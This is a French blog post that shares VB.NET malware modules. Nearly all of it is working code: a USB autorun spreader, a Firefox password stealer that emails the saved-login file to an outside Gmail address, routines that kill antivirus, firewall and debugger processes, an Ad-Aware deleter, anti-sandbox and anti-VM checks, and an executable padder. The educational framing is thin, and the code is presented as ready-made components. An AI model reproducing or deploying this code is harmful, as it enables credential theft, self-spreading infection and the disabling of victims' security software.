Malicious code boulix

Face cachée des Virus / Trojans et Malwares (VB.NET)

Aujourd’hui nous allons découvrir une certaine face cachée des Malwares / Virus / Trojans , les codes sources qui sont partagés sur le site nous permettent d’en apprendre plus sur leurs comportements !

L’équipe de Boulix.net ne vous aidera en aucun cas à compiler ces Codes sources , tout d’abord avant de commencer visitez la page « Réglement » si ce n’est pas fait.

Voici les codes sources qui sont partagés :

USB Spreader – Ce module permets d’injecter un executable Windows dès le branchement sur un PC via une clé USB (Si le PC est compatible bien sûr).
Firefox Stealer – Celui-ci permets de récupérer vos mots de passes enregistrés sur votre machine.
Anti-Sandboxie – By Sora – Ce module permets de désactiver le logiciel Sandboxie temporairement.
Anti Adware – By Rapid91 – La même chose mais pour le logiciel Adware.
Keyscrambler, Wireshark, Anubis, Malwarebytes, Kaspersky, Ollydbg, Outpost, Norman,Bit Defender, Nod32, Zone Alarm – Désactivation.
Anti Kaspersky, Anubis, Sandboxie, Virtual Box, VMWare, Virtual PC, and WireShark – Anti-anti-virus 😀
Anti: Anubis,Outpost,Norman,Bitdefender,Kapersky,Nod32,Zone Alarm – Anti-anti-virus 😀
Exe Pumper – Ce bout de code intéréssant permets d’ajouter du code inutile dans une application afin d’alourdir la taille du fichier !
————————————————–

Cliquer sur le code source que vous souhaitez décrouvrir 🙂

USB Spreader

Sub USBInfect() On Error Resume Next My.Computer.Registry.SetValue(« HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced », « Hidden », « 0 », Microsoft.Win32.RegistryValueKind.DWord) Dim sDrive As String, sDrives() As String, xDrive As String = My.Computer.FileSystem.SpecialDirectories.ProgramFiles sDrives = System.IO.Directory.GetLogicalDrives For Each sDrive In sDrives If xDrive.Contains(sDrive) Then Else My.Computer.FileSystem.CopyFile(Application.ExecutablePath, sDrive & « HDDFile.com », True, FileIO.UICancelOption.DoNothing) My.Computer.FileSystem.WriteAllText(sDrive & « autorun.inf », « [autorun] » & vbCrLf & « open= » & sDrive & « HDDFile.com » & vbCrLf & « shellexecute= » & sDrive, True) SetAttr(sDrive & « HDDFile.com », FileAttribute.Hidden) SetAttr(sDrive & « autorun.inf », FileAttribute.Hidden) End If Next End Sub

[collapse]
Firefox Stealer

Imports Microsoft.VisualBasic Imports System Imports System.Collections.Generic Imports System.IO Imports System.Net.Mail Imports System.Net Imports System.Text Imports System.Runtime.InteropServices Namespace ConsoleApplication1 Friend Class Program <DllImport(« kernel32.dll »)> _ Public Shared Function FreeConsole() As Boolean End Function Shared Sub Main(ByVal args() As String) FreeConsole() Try Dim FileFound As Boolean = False Dim Username As String = « [email protected] » Dim Password As String = « password » Dim Default As String = Environment.GetEnvironmentVariable(« APPDATA ») & « \Mozilla\Firefox\Profiles » Dim Dirs() As String = Directory.GetDirectories(Default) For Each dir As String In Dirs If (Not FileFound) Then Dim Files() As String = Directory.GetFiles(dir) For Each CurrFile As String In Files If (Not FileFound) Then If System.Text.RegularExpressions.Regex.IsMatch(CurrFile, « signons3.txt ») Then Dim Client As New SmtpClient(« smtp.gmail.com », 587) Client.EnableSsl = True Dim Creds As New NetworkCredential(Username, Password) Client.Credentials = Creds Dim msg As New MailMessage() msg.To.Add(New MailAddress(« [email protected] »)) msg.From = New MailAddress(Username) msg.Attachments.Add(New Attachment(CurrFile)) msg.Subject = « [Stolen]FF Passes[Rusty_v] » Client.Send(msg) FileFound = True End If Else Exit For End If Next CurrFile Else Exit For End If Next dir Catch End Try End Sub End Class End Namespace

[collapse]
Anti-Sandboxie - By Sora :

‘ Anti-Sandboxie Example ‘ Sora Option Explict Private Declare Function GetModuleHandle Lib « kernel32 » Alias « GetModuleHandleA » (ByVal lpModuleName As String) As Long Public Sub CompName() Dim Sandboxie as Boolean If GetModuleHandle(« SbieDll.dll ») Then Sandboxie = True If Sandboxie = True Then MsgBox « Sandboxie Detected » End If End Sub

[collapse]
Anti Adware - By Rapid91 :

‘Coded By Rue Port By Rapid91 Imports System.Runtime.InteropServices <DllImport(« kernel32.dll », CharSet := CharSet.Auto, SetLastError := True)> _ Public Shared Function DeleteFile(ByVal path As String) As Boolean End Function Shared Sub AdAware() Dim AdAwarePaths As New List(Of String)() Dim ProgramFiles As String = Shell32.GetCSIDLPath(Shell32.CSIDL.CSIDL_PROGRAM_FILES) AdAwarePaths.Add(ProgramFiles & « \Lavasoft\ ») For Each path As String In AdAwarePaths ‘Coded by Rue If Directory.Exists(path) Then Dim dirInfo As New DirectoryInfo(path) Dim dirFiles() As FileInfo = dirInfo.GetFiles(« *.* », SearchOption.AllDirectories) For Each file As FileInfo In dirFiles Try Kernel32.DeleteFile(file.FullName) Catch Continue For End Try Next file End If Next path Dim rmLMADKeys As RegistryKey = Registry.LocalMachine.OpenSubKey(« Software\Lavasoft\Ad-Aware\ », True) ‘Coded by Rue Dim LMValues() As String = rmLMADKeys.GetValueNames() For Each key As String In LMValues Try rmLMADKeys.DeleteValue(key) Catch Continue For End Try Next key rmLMADKeys.Close() End Sub

[collapse]
 
Keyscrambler, Wireshark, Anubis, Malwarebytes, Kaspersky, Ollydbg, Outpost, Norman,Bit Defender, Nod32, Zone Alarm :

‘—————General Dee’s Proccess Killers————- ‘———–Example Usage: « Anti-Keyscrambler() »—– ‘—————Permission: To Use With Credits———- ‘—————Coded: Visual Basic 2008——————- ‘Kills Keyscrambler, Wireshark, Anubis, Malwarebytes, Kaspersky, Ollydbg, Outpost, Norman,Bit Defender, Nod32, Zone Alarm’————————Keyscrambler—————————- Sub Anti-Keyscrambler() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « keyscrambler » generaldee(i).Kill() Case Else End Select Next Else End Sub’————————Wireshark—————————- Sub Anti-Wireshark() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « wireshark » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘—————————-Anubis——————————– Sub Anti-Anubis() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « anubis » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘————————Malwarebytes—————————- Sub Anti-Malwarebytes() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « mbam » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘————————Kaspersky—————————- Sub Anti-Kaspersky() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « avp » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘———————–Ollydbg——————————— Sub Anti-Ollydbg() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « ollydbg » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘———————–Outpost——————————— Sub Anti-Outpost() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « outpost » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘———————–Norman—————————— Sub Anti-Norman() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « npfmsg » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘———————–Bit Defender—————————— Sub Anti-BitDefender() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « bdagent » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘———————–NOD32—————————— Sub Anti-NOD32() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « egui » generaldee(i).Kill() Case Else End Select Next Else End Sub ‘———————–Zone Alarm—————————— Sub Anti-ZoneAlarm() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length – 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case « zlclient » generaldee(i).Kill() Case Else End Select Next Else End Sub

[collapse]
  
Anti Kaspersky, Anubis, Sandboxie, Virtual Box, VMWare, Virtual PC, and WireShark :

Imports Microsoft.Win32 Module Antis Dim Devices As Object, Grafikadapter As String, RegionA As String = « SELECT * FROM Win32_VideoController » Dim regPID As RegistryKey = Registry.LocalMachine.OpenSubKey(« SOFTWARE\Microsoft\Windows NT\CurrentVersion », False) Dim pid As Object = regPID.GetValue(« ProductId ») Dim id As String = « 76487-337-8429955-22614 » Public Function antiKAV() As Boolean On Error GoTo error1 If Process.GetProcessesByName(« avp »).Length >= 1 Then Return True Else Return False End If Exit Function error1: End End Function Private Sub AntiWireShark() Dim ProcessList As System.Diagnostics.Process() ProcessList = System.Diagnostics.Process.GetProcesses() Dim Proc As System.Diagnostics.Process Dim title As String For Each Proc In ProcessList title = Proc.MainWindowTitle If (String.Equals(title, « The Wireshark Network Analyzer »)) Then Proc.Kill() End If Next End Sub Public Function antiSandboxie() As Boolean On Error GoTo error1 If Process.GetProcessesByName(« SbieSvc »).Length >= 1 Then Return True Else Return False End If Exit Function error1: End End Function Public Function antiAnubis() As Boolean On Error GoTo error1 Dim folder As String = Application.StartupPath Dim getFile As String = folder & « \sample.exe » If Application.ExecutablePath = getFile Then Return True Else Return False End If Exit Function error1: End End Function Public Function antiAnubis2() As Boolean On Error GoTo error1 If pid = id Then Return True Else Return False End If Exit Function error1: End End Function Public Function AntiVirtualBox() As Boolean On Error GoTo error1 Call getDevices() Select Case Grafikadapter Case « VirtualBox Graphics Adapter » Return True Case Else Return False End Select Exit Function error1: End End Function Public Function AntiVmWare() As Boolean On Error GoTo error1 Call getDevices() Select Case Grafikadapter Case « VMware SVGA II » Return True Case Else Return False End Select Exit Function error1: End End Function Public Function AntiVirtualPC() As Boolean On Error GoTo error1 Call getDevices() Select Case Grafikadapter Case « VM Additions S3 Trio32/64 » Return True Case Else Return False End Select Exit Function error1: End End Function Private Sub getDevices() On Error GoTo error1 Devices = GetObject(« winmgmts: »).ExecQuery(RegionA) For Each AdaptList In Devices Grafikadapter = AdaptList.Description Next Exit Sub error1: End End Sub End Module

[collapse]
 
Anti: Anubis,Outpost,Norman,Bitdefender,Kapersky,Nod32,Zone Alarm :

Dim local As Process() = Process.GetProcesses Dim i As Integer For i = 0 To local.Length – 1 Debug.WriteLine(local(i).ProcessName) If Strings.UCase(local(i).ProcessName) = Strings.UCase(« sample ») Then ‘Anubis local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase(« outpost ») Then ‘Outpost local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase(« npfmsg ») Then ‘Norman local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase(« bdagent ») Then ‘Bitdefender local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase(« kavsvc ») Then ‘Kaspersky local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase(« egui ») Then ‘Nod32 local(i).Kill() If Strings.UCase(local(i).ProcessName) = Strings.UCase(« zlclient ») Then ‘Zonealarm local(i).Kill() End If End If End If End If End If End If End If Next

[collapse]
Exe Pumper :

Imports System Imports System.ComponentModel Imports System.IO Imports System.Windows.FormsNamespace AddBytes Public Partial Class Form1 Inherits Form Public Sub New() InitializeComponent() End SubPrivate Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs) End Sub Private Sub button1_Click(ByVal sender As Object, ByVal e As EventArgs) Dim file__1 = File.OpenWrite(textBox1.Text) Dim siza = file__1.Seek(0, SeekOrigin.[End]) Dim size = Convert.ToInt32(textBox2.Text) Dim bite As Decimal = size * 1048576 While siza < bite siza += 1 file__1.WriteByte(0) End While file__1.Close() MessageBox.Show(« Done ! ») End Sub Private Sub button2_Click(ByVal sender As Object, ByVal e As EventArgs) openFileDialog1.DefaultExt = « exe » openFileDialog1.Filter = « exe files (*.exe)|*.exe » openFileDialog1.FilterIndex = 1 If openFileDialog1.ShowDialog(Me) = DialogResult.OK Then textBox1.Text = String.Empty textBox1.Text = openFileDialog1.FileName End If End Sub Private Sub openFileDialog1_FileOk(ByVal sender As Object, ByVal e As CancelEventArgs) End Sub End Class End Namespace

[collapse]
———————————————————–
Voilà c’est terminé le plus simple logiciel pour programmer en vb.net est Visual Basic Express ! 😀
 Evidemment la plupart des codes sont détectés un prochain tutoriel apparaîtra pour étudier les détections des Anti-Virus.
🙂

Un petit partage serait super merci 😀

 

 

 

Laisser un commentaire